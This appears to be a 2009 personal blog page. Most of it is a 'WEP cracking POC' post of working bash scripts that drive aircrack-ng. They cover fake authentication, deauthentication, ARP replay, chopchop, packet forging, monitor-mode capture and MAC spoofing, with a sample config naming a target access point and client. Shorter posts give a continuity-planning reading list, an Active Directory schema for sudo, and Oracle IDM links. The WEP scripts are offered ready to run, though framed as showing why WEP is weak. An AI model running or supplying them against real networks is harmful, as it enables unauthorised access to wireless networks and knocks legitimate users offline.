24 Jun 2009

Business Continuity and Disaster Recovery Planning Resources

  1. Checklists, http://www.businesscontingency.com/checklist.php
  2. NIST SP800-34, Contingency Planning Guide for Information Technology Systems, http://csrc.nist.gov/publications/nistpubs/800-34/sp800-34.pdf
  3. ISO 27002 (or ISO 17799-2005), Code of practice for information security management, BCP is in section 14
  4. NFPA 1600, Standard on Disaster/Emergency Management and Business Continuity Programs, http://www.nfpa.org/assets/files/pdf/nfpa1600.pdf
  5. HIPAA, BCP in chapter 164.530, “Administrative Requirements: Policies & Procedures.”
  6. Gramm-Leach-Bliley (GLB), see Title V, some directives that will impact a financial institution’s BCP
  7. DRI Institute, https://www.drii.org/

17 Jun 2009

WEP cracking POC with aircrack-ng

Below you'll find my WEP key cracking script crack.sh. I use it in parallel with my capture script cap.sh to demonstrate how easy it is to crack WEP. You'll need to create your own crack.conf file (after performing some reconnaissance with Kismet or airodump-ng), and then you'll see how easy it is to crack WEP.

So don't use WEP!

###!/bin/bash
# File: crack.sh
# Interactive driver script; the network parameters it uses (essid, bssid,
# mac0, mac1, channel) come from ./crack.conf, which is sourced further down.
# NOTE(review): as published the first line is `###!/bin/bash`, i.e. a plain
# comment rather than a shebang, so the file has to be run as `bash crack.sh`.
# NOTE(review): PATH gains home-directory entries and /data/cap; any directory
# on PATH that is writable by someone else lets a planted file shadow the
# tools this script calls by bare name (aireplay-ng, tcpdump, ...).
PATH=$PATH:/usr/sbin:/sbin:/home/user/bin:/home/eric/bin:/sbin:/usr/sbin:/usr/local/bin:/data/cap
# Global holding the last answer typed at a prompt() call.
SEL=""
msg()
{
  # Show "== <message> " on a fresh line and pause until Enter is pressed.
  # The typed reply is kept in the global retkey (read without -r, so
  # backslashes in the reply are interpreted).
  printf '\n== %s ' "$1"
  read retkey
}

prompt()
{
  # Ask a question on a fresh line ("== <question> ") and store the reply
  # in the global SEL for the caller to inspect (read without -r).
  printf '\n== %s ' "$1"
  read SEL
}

# Check calling args
# Exactly one argument is accepted: the profile name that is handed on to
# crack.conf (it reaches the sourced file as $1, see `. $CONFFILE $1` below).
if [ $# -ne 1 ]
then
echo "Syntax: $0 CONFIGNAME"; exit 1
fi
# Default interface = last "802.11" line reported by iwconfig (stderr merged
# into the pipeline); the prompt below lets the user override it.
# `if` is used as a variable name: bash only treats `if` as a keyword when it
# is a bare word, so `if=...` and `$if` work, but it reads awkwardly.
echo "== List of available WLAN interfaces:"
iwconfig 2>&1 | grep 802.11 | awk '{print $1}'
if=`iwconfig 2>&1 | grep 802.11 | awk '{print $1}' | tail -1`

prompt "Type the interface to capture from: [$if]"
if [ "$SEL" != "" ]
then
if=$SEL
fi

# Enter network values here
# NOTE(review): -x tests the executable bit, yet the file is only sourced
# (read) below, so a readable but non-executable crack.conf is rejected here.
# Sourcing runs every line of the file in this shell: crack.conf must be as
# trusted as the script itself (owned and writable by the running user only).
CONFFILE=./crack.conf
if [ ! -x $CONFFILE ]
then
echo Config $CONFFILE is missing! Exiting.
exit 1
fi
echo "-- Reading configuration from $CONFFILE"
# The profile name ($1) is passed through as positional $1 of the sourced file.
. $CONFFILE $1

msg 'Pls start the capture in a separate terminal'
# An empty answer defaults to yes.  `-o` inside [ ] is obsolescent in POSIX
# test; `[[ "$SEL" = y || -z "$SEL" ]]` is the bash form.
prompt 'Run fake reauthenticationl? [y]'
if [ "$SEL" = y -o "$SEL" = "" ]
then
# Fake auth
aireplay-ng --fakeauth 0 -e "$essid" -a $bssid -h $mac0 $if
msg 'Check that association was successful'
fi

# Make choice of attack
prompt "Choose (0)deauth, (2)interactive-replay, (3)ARP-replay, (4)chopchop, (5)fragment:"
# No default arm: an empty or unlisted answer matches nothing, control falls
# through to esac and the script ends.
case $SEL in
0)
msg 'Will attempt deauthentication attack'
aireplay-ng -0 1 -a $bssid -h $mac1 $if
;;
2)
msg 'Will attempt replay attack interactively'
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b $bssid -h $mac0 $if

#msg 'Will attempt cracking WEP key with IVs received'
#aircrack-ng -a 1 -X -s wepch${channel}*.ivs
;;
3)
# ARP replay
msg 'Will run ARP replay'
aireplay-ng -3 -e "$ssid" -b $bssid -h $mac0 $if
;;
4|5)
# Chop chop
msg 'Will run Chop chop: choose the one where dest. MAC is not FF:FF:FF:FF:FF:FF'
aireplay-ng --chopchop -e "$ssid" -h $mac0 $if
#aireplay-ng -$SEL -e "$ssid" -b $bssid $if
msg 'Now copy the .cap file name into your clipboard (without .cap)'
prompt 'Enter the base filename here:'
read capfile

# Dump the packet to the screen
msg 'Packets captured will be dumped to the screen'
tcpdump -s 0 -n -e -r $capfile.cap
msg 'Copy the srcIP to clipboard'
echo -n 'Copy the IP here: '; read srcIP
msg 'Copy the dstIP to clipboard'
echo -n 'Copy the IP here: '; read dstIP

# Forge ARP packet
msg 'Will forge ARP packet'
packetforge-ng -0 -h $mac0 -c $mac1 -a $bssid -l $dstIP -k $srcIP -y $capfile.xor -w $arpcapfile

msg 'Will replay interactively from captured file (just select first shown)'
aireplay-ng --interactive -r $arpcapfile $if

#msg 'Will attempt cracking WEP key with IVs received'
#aircrack-ng -a 1 -X -s wepch${channel}*.ivs
;;
esac
=============================================================

###!/bin/bash
# File: cap.sh
# Front end to airodump-ng, usable interactively (no arguments) or from the
# command line; network parameters may come from a sourced crack.conf
# profile (readConfig) or from prompts/arguments.
# NOTE(review): `###!/bin/bash` is a comment, not a shebang; run with bash.
# NOTE(review): PATH gains home-directory entries and /data/cap; a directory
# on PATH writable by someone else lets a planted file shadow the tools this
# script calls by bare name.
PATH=$PATH:/usr/sbin:/sbin:/home/user/bin:/home/eric/bin:/sbin:/usr/sbin:/usr/local/bin:/data/cap
# Last answer typed at a prompt() call.
SEL=""
# airodump-ng option string, accumulated by readConfig/interact/capture and
# word-split on expansion.
opts=""

#######################################
msg()
{
  # Pause helper: print the message on a fresh line as "== <message> " and
  # wait for Enter.  The reply is stored in the global retkey (read without -r).
  echo
  printf '== %s ' "$1"
  read retkey
}

prompt()
{
  # Question helper: print "== <question> " on a fresh line and leave the
  # reply in the global SEL for the caller (read without -r).
  echo
  printf '== %s ' "$1"
  read SEL
}

usage(){
  # Print the three accepted invocation forms to stdout; $0 is the script name.
  cat <<EOF
Syntax: $0 (no args: interactive)
 $0 IF -f CONFIGNAME [AIRODUMP-NG_OPTS]
 $0 IF -c CHANNEL [AIRODUMP-NG_OPTS]
EOF
}
#######################################
readConfig(){
# Source ./crack.conf with the profile name in $1 and build the airodump-ng
# option string from the variables it sets (bssid, channel, type, band).
# Globals written: CONFNAME, CONFFILE, opts (none of them declared local).
# Arguments: $1 - profile name; any remaining args are appended to opts.
# Exits 1 when ./crack.conf fails the -x test below.
CONFNAME=$1
shift

# Enter network values here
# NOTE(review): -x tests the executable bit, but the file is only sourced
# (read) below, so a readable but non-executable crack.conf is rejected here.
# Sourcing executes every line of crack.conf in this shell: treat that file
# as code and keep it writable only by the account running this script.
CONFFILE=./crack.conf
if [ ! -x $CONFFILE ]
then
echo Config $CONFFILE is missing! Exiting.
exit 1
fi
echo "-- Reading configuration from $CONFFILE"
# The profile name is visible to the sourced file as its $1.
. $CONFFILE $CONFNAME
opts="--bssid $bssid" # Filter APs by BSSID
opts="$opts -w $CONFNAME-ch$channel" # Dump file prefix
opts="$opts -t $type" # Filter APs by cipher suite
opts="$opts --band $band" # Band on which airodump-ng should hop (abg)
opts="$opts --channel $channel" # Capture on specific channels
# Extra arguments are joined into the string and re-split on whitespace when
# opts is expanded unquoted later, so an argument containing spaces is lost.
opts="$opts $*"
}
#######################################
capture(){
# Run airodump-ng on $if with the accumulated $opts, optionally switching the
# interface into monitor mode first (and back to managed afterwards) via
# ./wlanconfig.sh.  Globals read: opts, if, mac0; written: opts, SEL, cmd.
#opts="$opts --ivs" # Save only captured IVs
#opts="$opts --gpsd" # Use GPSd
opts="$opts --update 2" # Display update delay in seconds
#opts="$opts --showack" # Prints ack/cts/rts statistics
#opts="$opts -h" # Hides known stations for --showack
#opts="$opts -f 1000" # Time in ms between hopping channels
opts="$opts -a" # Filter unassociated clients

# mac0 is only set when a crack.conf profile was sourced; if present, offer
# to apply it while switching to monitor mode.  Both prompts default to "n".
if [ "$mac0" != "" ]
then
prompt "Change MAC to $mac0? [n]"
if [ "$SEL" = "y" ]
then
./wlanconfig.sh $if monitor $mac0
fi
else
prompt "Configure for $if for monitoring mode? [n]"
if [ "$SEL" = "y" ]
then
./wlanconfig.sh $if monitor
fi
fi
# The command line is kept as one string and word-split when expanded
# unquoted below (deliberate, so $opts becomes separate arguments); the
# interface is the final argument.
cmd="airodump-ng $opts $if"
msg "About to run: $cmd"
# NOTE(review): the result of `cd dump` is not checked, so if dump/ is
# missing airodump-ng runs (and writes its files) in the current directory.
cd dump
$cmd

# ./wlanconfig.sh is a relative path, hence the `cd ..` out of dump/ first.
prompt "Configure $if back to normal managed mode? [n]"
if [ "$SEL" = "y" ]
then
cd ..
./wlanconfig.sh $if managed
fi
}
#######################################
interact(){
# Interactive path (script started without arguments): choose the interface,
# then either load a crack.conf profile through readConfig or build $opts
# from prompted channel/cipher answers.  Globals written: if, channel, opts,
# SEL (plus whatever readConfig sets).
echo "== List of available WLAN interfaces:"
iwconfig 2>&1 | grep 802.11 | awk '{print $1}' | sort
# Default to the last interface in sorted order; the prompt can override it.
if=`iwconfig 2>&1 | grep 802.11 | awk '{print $1}' | sort | tail -1`

prompt "Type the interface to capture from: [$if]"
if [ "$SEL" != "" ]
then
if=$SEL
fi

prompt "Use a known configuration? [n]"
if [ "$SEL" = "y" ]
then
prompt "Enter config name:"
# readConfig fills $opts itself, so the channel/cipher prompts below are skipped.
readConfig $SEL
return
fi

prompt "Capture on a specific channel? [n]"
if [ "$SEL" = "y" ]
then
channel=1
prompt "Enter channel number: [$channel]"
if [ "$SEL" != "" ]
then
channel=$SEL
fi
opts="--channel $channel"
opts="$opts -w ch$channel" # Dump file prefix
fi
# Any non-empty answer is passed to airodump-ng's -t exactly as typed; it is
# not validated against the list shown in the prompt.
prompt "Filter on cypher (OPN|WEP|WPA|WPA1|WPA2)? [All]"
if [ "$SEL" != "" ]
then
opts="$opts -t $SEL"
fi
}
#######################################

# Check calling args
# A single argument is an error (usage); with two or more the first is the
# interface and the second the operation (-c or -f); with none, go interactive.
if [ $# -eq 1 ]
then
usage
exit 1
fi
if [ $# -ge 2 ]
then
if=$1 ; shift;
op=$1 ; shift
else
op=interactive
fi

# Dispatch on the operation.  Remaining arguments ($*) are forwarded unquoted
# and therefore re-split on whitespace.
case $op in
-c)
channel=$1
shift
opts="-w ch$channel" # Dump file prefix
opts="$opts -c $channel" # Capture on specific channels
opts="$opts $*"
capture
;;
-f)
readConfig $*
capture
;;
interact*)
interact $*
capture
;;
*)
# Unknown operation: print usage only (no `exit 1` here, unlike the
# one-argument case above, so the script ends with usage's exit status).
usage
esac


=========================================================

###!/bin/bash
# File: wlanconfig.sh
# Switch a wireless interface between managed and monitor mode, optionally
# changing its MAC first; Atheros/madwifi interfaces (ath0/ath1 on top of
# wifi0) are handled by destroying and recreating the VAP.
# NOTE(review): `###!/bin/bash` is a comment, not a shebang; run with bash.
PATH=$PATH:/sbin:/usr/sbin:/usr/local/bin

printUsage(){
  # Print the usage text (blank line, synopsis, blank line, examples, blank
  # line) to stdout; $0 expands to the script name inside the here-doc.
  cat <<EOF

Usage: $0 IF MODE [NEWMAC]

Examples:
 $0 ath0 managed
 $0 ath0 monitor
 $0 wlan0 monitor
 $0 wlan0 monitor 11:22:33:44:55:66

EOF
}

# Arguments: IF MODE [NEWMAC]; MODE must be "managed" or "monitor".
if [ $# -lt 2 ]
then
printUsage
exit 1
fi

# Map the user-facing mode word to the madwifi wlanmode keyword ($mode); the
# word itself is kept in $modecmd for iwconfig and for the progress messages.
case $2 in
managed)
mode=sta
;;
monitor)
mode=monitor
;;
*)
printUsage
exit 1
esac

if=$1
bif=$1
modecmd=$2
mac=$3

# NOTE(review): none of the ifconfig/macchanger/wlanconfig/iwconfig calls
# below have their exit status checked and there is no `set -e`, so a failure
# (for example insufficient privilege) only shows in the tool's own error
# output while the remaining steps still run.
echo "-- Bringing $if down"
ifconfig $if down

# Set base interface to wifi0 if it's Atheros/madwifi
# (`-o` in [ ] is obsolescent; `[[ $if = ath0 || $if = ath1 ]]` is the bash form)
if [ $if = ath0 -o $if = ath1 ]
then
bif=wifi0
fi

# The MAC change is applied to the base device ($bif), not to the athN VAP.
if [ "$mac" != "" ]
then
echo "-- Changing MAC of $bif to $mac"
macchanger --mac $mac $bif
fi

# Special execution for Atheros/madwifi
# The athN VAP is destroyed and recreated on $bif with the requested wlanmode
# rather than reconfigured in place; other drivers use `iwconfig mode`.
if [ $if = ath0 -o $if = ath1 ]
then
echo "-- Destroying $if"
wlanconfig $if destroy

echo "-- Creating $if in $modecmd mode"
wlanconfig $if create wlandev $bif wlanmode $mode
else
#airmon-ng stop $if
#airmon-ng start $if
echo "-- Configuring $if for $modecmd mode"
iwconfig $if mode $modecmd
fi

echo "-- Bringing $if up"
ifconfig $if up

==============================================================

# File: Sample crack.conf
#if=wlan1 ; mac0=00:1B:2F:A9:D1:B9 # Orig MAC (rtl8087l)
#if=wifi0 ; mac0=06:23:4D:00:82:7C # Atheros 5007
#if=ath1 ; mac0=06:23:4D:00:82:7C # Atheros 5007
#if=wlan0 ; mac0=00:1B:2F:A9:D1:B9 # Orig MAC (rtl8087l)

# This file is sourced (`. ./crack.conf NAME`) by crack.sh and cap.sh, so every
# line here runs as shell code in the calling script; $1 is the profile NAME.
# Keep it owned and writable only by the user running those scripts.
# The single `*)` arm matches any NAME, so this sample ignores the argument;
# additional named arms placed before `*)` would select between profiles.
case $1 in
*)
channel=6 # Wireless channel
essid="TESTSSID" # SSID
bssid=00:18:39:C4:F6:85 # MAC of AP
mac0=00:29:2F:E5:AA:15 # Masquerading as internal MAC (if required by AP)
mac1=00:1F:F3:F9:C1:B1 # MAC of known target
# key=C3E07361D029ACEE81234446B4 (saved here after cracking)
type=WEP
band=g
;;
esac

Sudo config in Active Directory

My Active Directory schema update proposal got included in the sudo distribution. See the Sudo Change Log. The sudo README was also updated. I tested this successfully using LDAP-UX on HP-UX 11.X (11.1 or 11.2). This means that we could centralize the sudo configuration for multiple HP-UX hosts by using the sudo configuration coming from AD.

Here's my original post on the sudo website...

FYI,

I’m sending this to let other people benefit from this AD schema extension file in LDIF. This should work for most AD domain controller installations used as an LDAP server. As described in http://www.gratisoft.us/sudo/readme_ldap.html, this schema extension is necessary prior to loading the sudoers.ldif file in AD.

Note that the sudo distribution only includes the OpenLDAP and iPlanet extensions so the following file provides support for AD.

I was able to load it on my Windows 2003 server installation after using the following schema extension.

Cheers,
Eric.
# BEGINNING OF FILE
#==========================================================================
# File : sudoers-ad-schema.ldf
# Description : Active Directory Schema for sudo configuration (sudoers)
# Sanitized by : Eric Paquet, http://www.pcdsolutions.com
# Updated : 2008/05/08
# Support Info : No support, use at your own risk
#
# To extend your Active Directory schema, run the following command
# on your Windows DC:
#
# ldifde -i -f sudoers-ad-schema.ldf -c dc=X dc=YOURDOMAIN,DC=COM
#==========================================================================
dn: CN=sudoUser,CN=Schema,CN=Configuration,DC=X
changetype: add
objectClass: top
objectClass: attributeSchema
cn: sudoUser
distinguishedName: CN=sudoUser,CN=Schema,CN=Configuration,DC=X
instanceType: 4
attributeID: 1.3.6.1.4.1.15953.9.1.1
attributeSyntax: 2.5.5.5
isSingleValued: FALSE
showInAdvancedViewOnly: TRUE
adminDisplayName: sudoUser
adminDescription: User(s) who may run sudo
oMSyntax: 22
searchFlags: 1
lDAPDisplayName: sudoUser
name: sudoUser
schemaIDGUID:: JrGcaKpnoU+0s+HgeFjAbg==
objectCategory: CN=Attribute-Schema,CN=Schema,CN=Configuration,DC=X



dn: CN=sudoHost,CN=Schema,CN=Configuration,DC=X
changetype: add
objectClass: top
objectClass: attributeSchema
cn: sudoHost
distinguishedName: CN=sudoHost,CN=Schema,CN=Configuration,DC=X
instanceType: 4
attributeID: 1.3.6.1.4.1.15953.9.1.2
attributeSyntax: 2.5.5.5
isSingleValued: FALSE
showInAdvancedViewOnly: TRUE
adminDisplayName: sudoHost
adminDescription: Host(s) who may run sudo
oMSyntax: 22
lDAPDisplayName: sudoHost
name: sudoHost
schemaIDGUID:: d0TTjg+Y6U28g/Y+ns2k4w==
objectCategory: CN=Attribute-Schema,CN=Schema,CN=Configuration,DC=X



dn: CN=sudoCommand,CN=Schema,CN=Configuration,DC=X
changetype: add
objectClass: top
objectClass: attributeSchema
cn: sudoCommand
distinguishedName: CN=sudoCommand,CN=Schema,CN=Configuration,DC=X
instanceType: 4
attributeID: 1.3.6.1.4.1.15953.9.1.3
attributeSyntax: 2.5.5.5
isSingleValued: FALSE
showInAdvancedViewOnly: TRUE
adminDisplayName: sudoCommand
adminDescription: Command(s) to be executed by sudo
oMSyntax: 22
lDAPDisplayName: sudoCommand
name: sudoCommand
schemaIDGUID:: D6QR4P5UyUen3RGYJCHCPg==
objectCategory: CN=Attribute-Schema,CN=Schema,CN=Configuration,DC=X



dn: CN=sudoRunAs,CN=Schema,CN=Configuration,DC=X
changetype: add
objectClass: top
objectClass: attributeSchema
cn: sudoRunAs
distinguishedName: CN=sudoRunAs,CN=Schema,CN=Configuration,DC=X
instanceType: 4
attributeID: 1.3.6.1.4.1.15953.9.1.4
attributeSyntax: 2.5.5.5
isSingleValued: FALSE
showInAdvancedViewOnly: TRUE
adminDisplayName: sudoRunAs
adminDescription: User(s) impersonated by sudo
oMSyntax: 22
lDAPDisplayName: sudoRunAs
name: sudoRunAs
schemaIDGUID:: CP98mCQTyUKKxGrQeM80hQ==
objectCategory: CN=Attribute-Schema,CN=Schema,CN=Configuration,DC=X



dn: CN=sudoOption,CN=Schema,CN=Configuration,DC=X
changetype: add
objectClass: top
objectClass: attributeSchema
cn: sudoOption
distinguishedName: CN=sudoOption,CN=Schema,CN=Configuration,DC=X
instanceType: 4
attributeID: 1.3.6.1.4.1.15953.9.1.5
attributeSyntax: 2.5.5.5
isSingleValued: FALSE
showInAdvancedViewOnly: TRUE
adminDisplayName: sudoOption
adminDescription: Option(s) followed by sudo
oMSyntax: 22
lDAPDisplayName: sudoOption
name: sudoOption
schemaIDGUID:: ojaPzBBlAEmsvrHxQctLnA==
objectCategory: CN=Attribute-Schema,CN=Schema,CN=Configuration,DC=X



dn: CN=sudoRole,CN=Schema,CN=Configuration,DC=X
changetype: add
objectClass: top
objectClass: classSchema
cn: sudoRole
distinguishedName: CN=sudoRole,CN=Schema,CN=Configuration,DC=X
instanceType: 4
possSuperiors: container
possSuperiors: top
subClassOf: top
governsID: 1.3.6.1.4.1.15953.9.2.1
mayContain: sudoCommand
mayContain: sudoHost
mayContain: sudoOption
mayContain: sudoRunAs
mayContain: sudoUser
rDNAttID: cn
showInAdvancedViewOnly: FALSE
adminDisplayName: sudoRole
adminDescription: Sudoer Entries
objectClassCategory: 1
lDAPDisplayName: sudoRole
name: sudoRole
schemaIDGUID:: SQn432lnZ0+ukbdh3+gN3w==
systemOnly: FALSE
objectCategory: CN=Class-Schema,CN=Schema,CN=Configuration,DC=X
defaultObjectCategory: CN=sudoRole,CN=Schema,CN=Configuration,DC=X

# END OF FILE

My Oracle IDM posts

Those are just for my own reference:
  1. eSSO LM with ADAM
    Posted on: Apr 4, 2007 5:58 PM
  2. OIM PeopleSoft Connector Employee Bulk Reconciliation
    Posted on: Sep 5, 2007 10:46 PM
  3. Oracle eSSO Kiosk Mode - Application Shutdown
    Posted on: Apr 3, 2007 11:25 PM
  4. About Oracle Enterprise single sign-on ESSO
    Posted on: Jun 4, 2007 6:47 PM
  5. Configuration Assistants Fail after SOA Suite 10.1.3 install
    Posted on: Dec 14, 2007 8:03 PM
  6. Flat File Generic Connector: Unable to Create Connector
    Posted on: Feb 5, 2008 11:59 PM
  7. OIM - AD Connector 904
    Posted on: Aug 3, 2007 11:00 AM
  8. OIM Admin Console Customization: Replacing product logo
    Posted on: Feb 27, 2008 8:09 PM
  9. OIM Rogue Accounts Report
    Posted on: Feb 26, 2008 11:22 AM
  10. Searching for OIM user based on UDF using API
    Posted on: Jan 15, 2008 9:43 PM